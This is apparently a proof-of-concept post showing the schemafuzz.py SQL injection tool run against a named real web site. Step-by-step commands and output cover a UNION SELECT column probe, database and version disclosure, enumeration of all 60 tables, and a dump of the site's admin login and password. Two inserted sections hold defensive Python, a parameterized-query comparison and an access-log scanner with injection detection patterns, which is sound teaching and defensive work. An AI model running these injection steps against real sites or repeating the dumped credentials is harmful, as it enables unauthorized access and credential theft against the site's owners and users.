[POC] Schemafuzz.py

Software:
- OS: Windows
- Browser: Mozilla
- Python 2.5 (download here)
- Schemafuzz.py (download here)

Target: http://justclone.com/alibabaclone/category.php?IndustryID=44

POC:

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
C:\Python25>schemafuzz.py --findcol -u http://justclone.com/alibabaclone/category.php?IndustryID=44--

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44--
[+] Evasion Used: "+" "--"
[+] 13:31:32
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,
[+] Column Length is: 2
[+] Found null column at column #: 1
[+] SQLi URL: http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,1--
[+] darkc0de URL: http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de
[-] Done!
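What the `--findcol` run above is doing: the tool appends `--` to the parameter so that whatever SQL follows the injected value is commented out, then tries `UNION SELECT 0`, `UNION SELECT 0,1`, ... until the column count of the injected SELECT matches the original query and the page renders the literal `1` (the "null column"). The following is an added example, not code from the page or from schemafuzz's author: a Python model of the target's `category.php` query in SQLite (standing in for MySQL), written the way the page's behaviour suggests the server builds it, with the query-string value concatenated into the SQL text, next to a parameterized version that validates and binds the value. The table and column names come from the page's schema listing; the rows, the concatenation, and the `ORDER BY` tail are assumptions, since the page shows no server code.

```python
import sqlite3

# Constructed in-memory stand-in for the site's database. Table and column
# names are taken from the page's --schema output; the rows are made up.
def build_db():
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE categories (CategoryID INTEGER, IndustryID INTEGER, Category TEXT)")
    cur.executemany("INSERT INTO categories VALUES (?, ?, ?)",
                    [(1, 44, "Agriculture"), (2, 44, "Food"), (3, 7, "Textiles")])
    cur.execute("CREATE TABLE admin (LoginID TEXT, Password TEXT)")
    cur.execute("INSERT INTO admin VALUES (?, ?)", ("admin", "<placeholder-hash>"))
    conn.commit()
    return conn


def categories_vulnerable(conn, industry_id):
    """Assumed shape of the target's query: the raw query-string value is
    pasted into the SQL. A trailing '--' in the value comments out the
    ORDER BY tail, which is why the tool's URLs end that way."""
    sql = ("SELECT CategoryID, Category FROM categories WHERE IndustryID="
           + industry_id + " ORDER BY CategoryID")
    return conn.execute(sql).fetchall()


def categories_hardened(conn, industry_id):
    """Same query with an allow-list check and a bound parameter: the value
    is data, never SQL syntax, so a UNION probe is rejected outright."""
    try:
        value = int(industry_id)
    except (TypeError, ValueError):
        raise ValueError("IndustryID must be an integer")
    sql = "SELECT CategoryID, Category FROM categories WHERE IndustryID=? ORDER BY CategoryID"
    return conn.execute(sql, (value,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    probe = "44 AND 1=2 UNION SELECT 0,1--"      # the page's column-count probe
    print(categories_vulnerable(db, "44"))       # normal result
    print(categories_vulnerable(db, probe))      # [(0, 1)]: the 'null column' the tool reports
    try:
        categories_hardened(db, probe)
    except ValueError as exc:
        print("hardened query rejected the probe:", exc)
```

Run against the vulnerable function, the page's probe returns the row `(0, 1)` instead of any category, which is exactly the signal schemafuzz keys on; the hardened function never lets the value reach the SQL parser. Binding alone would also have sufficed, but the integer check gives a clean error to log before any database round trip.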


C:\Python25>schemafuzz.py --dbs -u http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de--
[+] Evasion Used: "+" "--"
[+] 13:34:31
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: justclo_alibaba
User: justclo_alibab@localhost
Version: 5.0.81-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0]justclo_alibaba

[-] [13:34:35]
[-] Total URL Requests 3
[-] Done


C:\Python25>schemafuzz.py --schema -u http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de -D justclo_alibaba

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de--
[+] Evasion Used: "+" "--"
[+] 13:37:08
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: justclo_alibaba
User: justclo_alibab@localhost
Version: 5.0.81-community
[+] Showing Tables & Columns from database "justclo_alibaba"
[+] Number of Tables: 60

[Database]: justclo_alibaba
[Table: Columns]
[0]admin:
LoginID,Password,AdminEmail,AdminEmailPassword,smtp,ScriptName,url,smtpstatus,port,Title,nochex,twoco,paypal,goldmemberfee
[1]all_leads: AllLeadsID,LeadID,LeadType,leadstatus,LeadAddedDate
[2]buyer: BuyerID,Password,BusinessEmail,FirstName,LastName,Sex,IndustryID,StreetAddress,StreetAddress2,StreetAddress3,City,Province,Country,Zip_PostelCode,Phone,Mobile,Active,ConfirmationCode,GoldMember,GoldMemberDate,Fax,Website,featured
[3]buyer_blogs: BuyerBlogID,BlogTitle,BlogStatus,Blog,BuyerID,BlogAddedDate
[4]buyer_leads:
BuyerLeadID,BuyerID,Subject,ProductKeyword,MoreKeywords,CategoryID,Details,Quantity,Packaging,ValidDates,PurchaseType,ProductPhoto,thumb1,thumb2,AddedDate,ExpiryDate,ExpireAfter,buyingleadstatus
[5]buyer_messages:
BuyerMessageID,SenderID,SenderType,RecieverID,ReadStatus,Subject,Message,CompanyName,ContactName,StreetAddress,StreetAddress2,StreetAddress3,Phone,Email,Fax,Website,MessageDate
[6]buyer_profile:
BuyerProfileID,BuyerID,CompanyName,CompanyLogo,CompanyLogo2,BusinessType,JobTitle,NumOfEmployees,LegalRepresentative,AnnualSalesRange,YearEstablished,Certifications,CompanyIntroduction,KeyProducts,AboutUs,AboutUsImage,bigbuyer,DateAdded
[7]buyer_video: BuyerVideoID,BuyerID,video,AddedDate
[8]buyercomments: CommentID,Comment,BuyerID,Rating,CommentBy,Status,AddedDate
[9]categories: CategoryID,IndustryID,Category
[10]contactus: contactus,note
[11]countries: CountryID,Country
[12]countries_show: CountryShowID,Country,Logo,LogoThumb,AddedDate
[13]industry: IndustryID,Industry
[14]news: NewsID,Title,Details,AddedDate,hot
[15]newsletter_subscribers: id,email,ConfirmationCode,status,AddedDate
[16]partner_sites: PartnerSiteID,logo,url,AddedDate
[17]phpbb_auth_access: group_id,forum_id,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments,auth_mod
[18]phpbb_banlist: ban_id,ban_userid,ban_ip,ban_email
[19]phpbb_categories: cat_id,cat_title,cat_order
[20]phpbb_config: config_name,config_value
[21]phpbb_confirm: confirm_id,session_id,code
[22]phpbb_disallow: disallow_id,disallow_username
[23]phpbb_forum_prune: prune_id,forum_id,prune_days,prune_freq
[24]phpbb_forums: forum_id,cat_id,forum_name,forum_desc,forum_status,forum_order,forum_posts,forum_topics,forum_last_post_id,prune_next,prune_enable,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments
[25]phpbb_groups: group_id,group_type,group_name,group_description,group_moderator,group_single_user
[26]phpbb_posts:
post_id,topic_id,forum_id,poster_id,post_time,poster_ip,post_username,enable_bbcode,enable_html,enable_smilies,enable_sig,post_edit_time,post_edit_count
[27]phpbb_posts_text: post_id,bbcode_uid,post_subject,post_text
[28]phpbb_privmsgs:
privmsgs_id,privmsgs_type,privmsgs_subject,privmsgs_from_userid,privmsgs_to_userid,privmsgs_date,privmsgs_ip,privmsgs_enable_bbcode,privmsgs_enable_html,privmsgs_enable_smilies,privmsgs_attach_sig
[29]phpbb_privmsgs_text: privmsgs_text_id,privmsgs_bbcode_uid,privmsgs_text
[30]phpbb_ranks: rank_id,rank_title,rank_min,rank_special,rank_image
[31]phpbb_search_results: search_id,session_id,search_time,search_array
[32]phpbb_search_wordlist: word_text,word_id,word_common
[33]phpbb_search_wordmatch: post_id,word_id,title_match
[34]phpbb_sessions: session_id,session_user_id,session_start,session_time,session_ip,session_page,session_logged_in,session_admin
[35]phpbb_sessions_keys: key_id,user_id,last_ip,last_login
[36]phpbb_smilies: smilies_id,code,smile_url,emoticon
[37]phpbb_themes:
themes_id,template_name,style_name,head_stylesheet,body_background,body_bgcolor,body_text,body_link,body_vlink,body_alink,body_hlink,tr_color1,tr_color2,tr_color3,tr_class1,tr_class2,tr_class3,th_color1,th_color2,th_color3,th_class1,th_class2,th_class3,td_color1,td_color2,td_color3,td_class1,td_class2,td_class3,fontface1,fontface2,fontface3,fontsize1,fontsize2,fontsize3,fontcolor1,fontcolor2,fontcolor3,span_class1,span_class2,span_class3,img_size_poll,img_size_privmsg
[38]phpbb_themes_name:
themes_id,tr_color1_name,tr_color2_name,tr_color3_name,tr_class1_name,tr_class2_name,tr_class3_name,th_color1_name,th_color2_name,th_color3_name,th_class1_name,th_class2_name,th_class3_name,td_color1_name,td_color2_name,td_color3_name,td_class1_name,td_class2_name,td_class3_name,fontface1_name,fontface2_name,fontface3_name,fontsize1_name,fontsize2_name,fontsize3_name,fontcolor1_name,fontcolor2_name,fontcolor3_name,span_class1_name,span_class2_name,span_class3_name
[39]phpbb_topics:
topic_id,forum_id,topic_title,topic_poster,topic_time,topic_views,topic_replies,topic_status,topic_vote,topic_type,topic_first_post_id,topic_last_post_id,topic_moved_id
[40]phpbb_topics_watch: topic_id,user_id,notify_status
[41]phpbb_user_group: group_id,user_id,user_pending
[42]phpbb_users:
user_id,user_active,username,user_password,user_session_time,user_session_page,user_lastvisit,user_regdate,user_level,user_posts,user_timezone,user_style,user_lang,user_dateformat,user_new_privmsg,user_unread_privmsg,user_last_privmsg,user_login_tries,user_last_login_try,user_emailtime,user_viewemail,user_attachsig,user_allowhtml,user_allowbbcode,user_allowsmile,user_allowavatar,user_allow_pm,user_allow_viewonline,user_notify,user_notify_pm,user_popup_pm,user_rank,user_avatar,user_avatar_type,user_email,user_icq,user_website,user_from,user_sig,user_sig_bbcode_uid,user_aim,user_yim,user_msnm,user_occ,user_interests,user_actkey,user_newpasswd
[43]phpbb_vote_desc: vote_id,topic_id,vote_text,vote_start,vote_length
[44]phpbb_vote_results: vote_id,vote_option_id,vote_option_text,vote_result
[45]phpbb_vote_voters: vote_id,vote_user_id,vote_user_ip
[46]phpbb_words: word_id,word,replacement
[47]products:
ProductID,SellerID,ProductPhoto,ProductPhoto2,ProductPhoto3,ProductPhoto4,thumb1,thumb2,thumb3,thumb1_2,thumb1_3,thumb1_4,thumb2_2,thumb2_3,thumb2_4,thumb3_2,thumb3_3,thumb3_4,ProductName,ModelNo,ProductKeyword,CategoryID,ProductDescription,PlaceOfOrigin,BrandName,PriceTerms,Price,Packing,PaymentTerms,DeliveryTime,MinimumOrders,SupplyAbility,QualityCertification,AddedDate,productstatus,viewcounter,featured
[48]rightbanners: id,CategoryID,Banner,page,link,BannerNumber,AddedDate
[49]seller:
SellerID,Password,BusinessEmail,FirstName,LastName,Sex,IndustryID,StreetAddress,StreetAddress2,StreetAddress3,City,Province,Country,Zip_PostelCode,Phone,Mobile,Active,ConfirmationCode,GoldMember,GoldMemberDate,Fax,Website,MemberSince,Gold,featured
[50]seller_blogs: SellerBlogID,BlogTitle,BlogStatus,Blog,SellerID,BlogAddedDate
[51]seller_categories: SellerCategoryID,SellerID,CategoryID
[52]seller_messages:
SellerMessageID,SenderID,SenderType,RecieverID,ReadStatus,Subject,Message,CompanyName,ContactName,StreetAddress,StreetAddress2,StreetAddress3,Phone,Email,Fax,Website,MessageDate
[53]seller_profile:
SellerProfileID,SellerID,CompanyName,CompanyLogo,CompanyLogo2,BusinessType,JobTitle,NumOfEmployees,LegalRepresentative,AnnualSalesRange,YearEstablished,Certifications,CompanyIntroduction,KeyProducts,AboutUs,AboutUsImage,DateAdded
[54]seller_video: SellerVideoID,SellerID,video,AddedDate
[55]sellercomments: CommentID,Comment,SellerID,Rating,CommentBy,Status,AddedDate
[56]selling_leads:
SellingLeadID,Subject,ProductPhoto,thumb1,thumb2,BriefDescription,DetailedDescription,Keyword,CategoryID,SellerID,AddedDate,ExpiryDate,ExpireAfter,sellingleadstatus,featured
[57]success_stories: SuccessStoryID,Title,Name,Thumb,Details,AddedDate
[58]topbanners: id,SubCategoryID,Banner,page,link,CategoryID,AddedDate
[59]trade_shows: TradeShowID,Name,Logo,LogoThumb,StartDate,EndDate,Address,OpenTime,url,AddedDate

[-] [13:49:10]
[-] Total URL Requests 580
[-] Done


C:\Python25>schemafuzz.py --dump -u http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de -D justclo_alibaba -T admin -C LoginID,Password

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de--
[+] Evasion Used: "+" "--"
[+] 14:03:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: justclo_alibaba
User: justclo_alibab@localhost
Version: 5.0.81-community
[+] Dumping data from database "justclo_alibaba" Table "admin"
[+] Column(s) ['LoginID', 'Password']
[+] Number of Rows: 1

[0] admin:admin123:admin123:

[-] [14:03:15]
[-] Total URL Requests 3
[-] Done
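Seen from the server side, the four runs above leave an unmistakable trail in the web server's access log: `UNION SELECT` inside a parameter that should only ever be an integer, a trailing `--`, the tool's `darkc0de` marker string, and (for the `--schema` run) 580 requests from one client between 13:37 and 13:49. The following is an added example, not code from the page or from the tool's author: a Python scanner over Apache combined-format log lines that decodes each query string, flags those indicators, enforces an allow-list rule that `IndustryID` must be numeric, and counts flagged requests per source address. All log lines, addresses, timestamps and the user agent are constructed; the `information_schema` request is a constructed guess at what one schema-enumeration request looks like, not a captured schemafuzz request.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache combined-format lines modelled on the URLs in the tool
# output above. The information_schema line is a guess, not a real capture.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jun/2008:13:31:32 +0700] "GET /alibabaclone/category.php?IndustryID=44-- HTTP/1.1" 200 5120 "-" "Python-urllib/2.5"
203.0.113.5 - - [12/Jun/2008:13:31:33 +0700] "GET /alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0-- HTTP/1.1" 200 4870 "-" "Python-urllib/2.5"
203.0.113.5 - - [12/Jun/2008:13:31:33 +0700] "GET /alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,1-- HTTP/1.1" 200 5133 "-" "Python-urllib/2.5"
203.0.113.5 - - [12/Jun/2008:13:34:31 +0700] "GET /alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de-- HTTP/1.1" 200 5140 "-" "Python-urllib/2.5"
203.0.113.5 - - [12/Jun/2008:13:37:10 +0700] "GET /alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,table_name+FROM+information_schema.tables-- HTTP/1.1" 200 6011 "-" "Python-urllib/2.5"
198.51.100.7 - - [12/Jun/2008:13:40:02 +0700] "GET /alibabaclone/category.php?IndustryID=44 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Jun/2008:13:40:05 +0700] "GET /alibabaclone/category.php?IndustryID=12 HTTP/1.1" 200 5098 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')

# Allow-list: parameters on the page that must be plain integers.
NUMERIC_PARAMS = {"IndustryID"}

# Indicators taken from the request URLs shown in the tool output.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\b\s+(all\s+)?\bselect\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("comment_terminator", re.compile(r"(--|#)\s*$")),
    ("tool_marker", re.compile(r"darkc0de", re.I)),
]


def analyse_request(target):
    """Return the indicator names that fire for one request target.
    The query is decoded first so '+' and %xx evasion do not hide keywords."""
    parts = urlsplit(target)
    decoded = unquote_plus(parts.query)
    hits = [name for name, rx in INDICATORS if rx.search(decoded)]
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            hits.append("non_numeric:" + key)
    return hits


def scan_log(text):
    """Return (ip, timestamp, target, hits) for every request that triggers an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = analyse_request(m.group("target"))
        if hits:
            findings.append((m.group("ip"), m.group("ts"), m.group("target"), hits))
    return findings


def suspicious_sources(findings, threshold=3):
    """Source addresses with at least `threshold` flagged requests. A schema
    enumeration like the one on the page (hundreds of requests in minutes)
    stands out on volume even before the payloads are inspected."""
    counts = Counter(ip for ip, _, _, _ in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, ts, target, hits in found:
        print(ip, ts, ",".join(hits), target)
    print("sources over threshold:", suspicious_sources(found))
```

The `non_numeric` check is the most durable of the rules: it fires on the very first probe (`IndustryID=44--`), before any SQL keyword appears, and it does not depend on recognising a particular tool. In production the same allow-list belongs in the application itself, so that the request is refused rather than merely logged.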
